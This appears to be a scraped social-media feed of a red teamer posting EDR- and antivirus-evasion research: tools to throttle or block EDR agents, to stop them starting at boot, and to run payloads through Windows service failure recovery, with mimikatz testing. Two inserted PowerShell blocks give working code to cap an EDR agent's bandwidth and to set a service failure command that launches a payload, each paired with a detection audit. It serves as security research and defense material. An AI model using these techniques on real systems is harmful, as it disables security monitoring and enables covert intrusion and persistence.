Chief Security Officer (CSO) || Security Researcher at ZeroSalarium.com || Penetration Tester || Red Teamer || Social Engineering Awareness Trainer

Joined September 2024
Pinned Tweet
New #redteam tool for blocking EDRs: EDRChoker Instead of fully blocking the EDR agents' connections to their server, we can throttle their bandwidth so they consistently time out when sending data, which is effectively the same as blocking but avoids triggering "block" or "drop" packet events #pentest #cybersecurity Github: TwoSevenOneT/EDRChoker
EDRChoker uses Policy-based Quality of Service (QoS) to set hard bandwidth caps (throttling) on Endpoint Detection and Response (EDR) agents, causing them to always time out - effectively blocking them. #itsecurity #securityblog #antimalware zerosalarium.com/2026/06/edr…
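As an added illustration of the mechanism this post describes (this is not EDRChoker's own code), the PowerShell below creates a policy-based QoS rule that caps the outbound bandwidth of one process image, then audits the machine for any QoS policy carrying a throttle action, which is the check a defender would want to run. The agent path and policy name are hypothetical; the output property names AppPathNameMatchCondition and ThrottleRateActionBitsPerSecond are assumed to match the New-NetQosPolicy parameter names, and the Group Policy registry layout under HKLM\SOFTWARE\Policies\Microsoft\Windows\QoS is also an assumption. It needs an elevated prompt on Windows 10/11 or Server; run it only in a lab you control.

```powershell
# Added example, not EDRChoker's code. Elevated PowerShell on Windows 10/11; lab use only.
# Hypothetical agent image path and policy name.
$AgentPath  = 'C:\Program Files\ExampleEDR\agent.exe'
$PolicyName = 'QoSThrottleDemo'

function New-ThrottlePolicy {
    param(
        [string]$Name,
        [string]$ImagePath,
        [uint64]$BitsPerSecond = 8000   # 8 kbit/s: agent uploads stall and time out
    )
    # Policy-based QoS matches on the image path of the sending process and applies
    # a rate cap rather than a block, so the firewall/WFP never records a dropped packet.
    New-NetQosPolicy -Name $Name `
                     -AppPathNameMatchCondition $ImagePath `
                     -ThrottleRateActionBitsPerSecond $BitsPerSecond `
                     -NetworkProfile All
}

function Find-ThrottlingQosPolicies {
    # Local store: any policy with a throttle action is suspect on an endpoint that
    # has no business shaping traffic. Assumption: the output objects expose the same
    # property names as the New-NetQosPolicy parameters.
    Get-NetQosPolicy -ErrorAction SilentlyContinue |
        Where-Object { $_.ThrottleRateActionBitsPerSecond -gt 0 } |
        Select-Object @{n='Source';e={'LocalStore'}}, Name, Owner, NetworkProfile,
                      AppPathNameMatchCondition, ThrottleRateActionBitsPerSecond

    # GPO-delivered store (assumed layout): one subkey per policy with
    # 'Application Name' and 'Throttle Rate' values.
    $gpo = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\QoS'
    if (Test-Path $gpo) {
        Get-ChildItem $gpo | ForEach-Object {
            $p = Get-ItemProperty $_.PSPath
            if ($p.'Throttle Rate' -and $p.'Throttle Rate' -ne '-1') {
                [pscustomobject]@{
                    Source                          = 'GroupPolicy'
                    Name                            = $_.PSChildName
                    Owner                           = 'GPO'
                    NetworkProfile                  = $null
                    AppPathNameMatchCondition       = $p.'Application Name'
                    ThrottleRateActionBitsPerSecond = $p.'Throttle Rate'
                }
            }
        }
    }
}

# Lab walk-through: apply the cap, show how it surfaces to an auditor, then remove it.
New-ThrottlePolicy -Name $PolicyName -ImagePath $AgentPath -BitsPerSecond 8000
Find-ThrottlingQosPolicies | Format-Table -AutoSize
Remove-NetQosPolicy -Name $PolicyName -Confirm:$false
```

The audit half is the part worth keeping: an endpoint baseline normally has zero local QoS policies with a throttle action, so a non-empty result from Find-ThrottlingQosPolicies, or a policy whose path condition names a security product, is a cheap detection for this class of tampering.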
Some powerful built-in Windows 11 programs are allowed to write files to Defender's working directory: \System32\msiexec.exe, \Register-CimProvider.exe, \svchost.exe, \lsass.exe. Tools and methods to find these whitelisted programs for other #antimalware: Github: TwoSevenOneT/DefenderWrite
Challenge: Drop #mimikatz onto a drive with the latest Windows 11. 1. Found a way to write a file into Windows Defender’s working directory: Success ✅ 2. Dropped "mimikatz.exe" into that folder: Failed 🛑 Conclusion: Windows Defender does not exclude its own executable folder
While I was trying to evade cloud-based EDRs, I accidentally found a way to temporarily block a client machine's network with a POC running as a normal user, without using the Windows Filtering Platform (WFP), which requires admin privileges. I haven't thought of exploitation scenarios for this tool yet; it might be a dead-end #antimalware research direction 🤔 #redteam
Need to survey which Antivirus product to prioritize bypassing
Had a Threat Actor ask for an anti-virus recommendation DAWG, YOU ARE THE THREAT. WHY DO YOU NEED AN AV?
To be honest, in many cases I test evasion or antivirus bypass by dropping #mimikatz onto the Desktop and running it to see if it works. I don't use the EICAR test file 😂 Drop Mimikatz and the AV doesn't complain ==> something's worked
Want to feel like a #hacker but are afraid to put the #mimikatz binary on your desktop?
They work harder than the sysadmin team to configure users' machines 🤣
BlackSanta EDR-Killer Operations github.com/blackorbird/APT_R…
Two Seven One Three retweeted
Mar 10
I am releasing a new toolkit I built for IIS-based lateral movement and code execution within IIS worker pool process's memory. Phantom ASPX Loader & PhantomLink -- a two-part toolkit for reflectively loading native DLLs into IIS w3wp.exe worker processes via ASPX. github.com/zux0x3a/Phantom/t…
Two Seven One Three retweeted
Recently my RE workflow moved into sandboxed VMs where agents have full control over the environment. I needed an MCP server that runs headless in the same sandbox and exposes way more of the #BinaryNinja API than others. Here's the release: github.com/mrphrazer/binary-…
You can exploit the Service Failure Recovery feature of Windows Service to execute a payload without ever touching the ImagePath. #antimalware #redteam #Pentesting
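As an added illustration of what this post describes (not the author's tooling), the PowerShell below shows both halves of the technique: the documented sc.exe syntax that makes the Service Control Manager run an arbitrary command when a service fails, leaving ImagePath untouched, and a sweep of every service's FailureCommand registry value, which is where that command is stored and where a defender should look. The service name and payload path are hypothetical, the service must already exist, and nothing fires until the service actually fails; run it only in a lab you control from an elevated prompt.

```powershell
# Added example, not the author's tooling. Elevated PowerShell; lab use only.
# Hypothetical service name and payload path; the service must already exist.
$ServiceName = 'ExampleSvc'
$Payload     = 'C:\Lab\payload.exe'

function Set-FailureRecoveryCommand {
    param([string]$Name, [string]$Command)
    # sc.exe requires the space after each '='. reset= 0 re-arms the failure counter
    # at once; actions= run/1000 runs the command 1 s after the first failure, and the
    # two further run/1000 entries cover the second and subsequent failures.
    # Nothing under ImagePath changes: the SCM itself launches the command.
    sc.exe failure $Name reset= 0 actions= run/1000/run/1000/run/1000 command= "`"$Command`""
    # Fire on a stop with a non-zero exit code as well, not only on a crash.
    sc.exe failureflag $Name 1
    # Show the resulting recovery configuration as the SCM sees it.
    sc.exe qfailure $Name
}

function Get-ServiceFailureCommands {
    # FailureCommand (REG_SZ) under HKLM\SYSTEM\CurrentControlSet\Services\<svc> is
    # where 'sc failure ... command=' lands; FailureActions (REG_BINARY) holds the
    # reset period and the action list. Services that ship with a run action are rare,
    # so every hit deserves a look at the command, its path and who can write to it.
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
            if ($p.FailureCommand) {
                [pscustomobject]@{
                    Service        = $_.PSChildName
                    ImagePath      = $p.ImagePath
                    FailureCommand = $p.FailureCommand
                    HasFailureActions = [bool]$p.FailureActions
                }
            }
        }
}

function Clear-FailureRecoveryCommand {
    param([string]$Name)
    # Removing the two values returns the service to "take no action".
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    Remove-ItemProperty -Path $key -Name FailureCommand -ErrorAction SilentlyContinue
    Remove-ItemProperty -Path $key -Name FailureActions -ErrorAction SilentlyContinue
}

# Lab walk-through: configure, audit, then clean up.
Set-FailureRecoveryCommand -Name $ServiceName -Command $Payload
Get-ServiceFailureCommands | Format-Table -AutoSize
Clear-FailureRecoveryCommand -Name $ServiceName
```

Get-ServiceFailureCommands is the reusable piece: schedule it as a baseline diff and alert on any service whose FailureCommand appears, changes, or points outside Program Files and System32, since that value is exactly what ImagePath-focused persistence hunts miss.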
Throughout my soulless pentesting career, I have always preferred the Nday or "features" of the system over what is marketed as 0day
Oracle E-Business Suite Authentication Bypass & RCE (CVE-2025-61882) vred.mbbank.com.vn/p/oracle-…
Every time I read a detection rule, I instinctively have devilish thoughts racing through my mind to bypass them😂
Detecting EDRStartupHinder in Microsoft Defender for Endpoint 🛑 EDRStartupHinder, developed by @TwoSevenOneT, is a proof-of-concept tool that abuses Windows Bindlink to prevent Antivirus/EDR services from starting at boot. It achieves this by redirecting critical System32 DLLs, ultimately forcing protected processes to terminate themselves. zerosalarium.com/2026/01/edr… To support fellow defenders, I've crafted a Defender XDR Advanced Hunting KQL query that can be deployed in your environment to help monitor and detect potential use of EDRStartupHinder. 🫡 🔍 Stay vigilant, share knowledge, and strengthen our collective defenses. #CyberSecurity #ThreatDetection #MDE #EDRStartupHinder
You can prevent #antimalware / EDR services from running at startup by using Bindlink Github: TwoSevenOneT/EDRStartupHinder #securityvulnerability #itsecurity
Two Seven One Three retweeted
18 Nov 2025
Using the Don't Look Up Tool to Eavesdrop on Insecure Private Satellite Communications rtl-sdr.com/using-the-dont-l…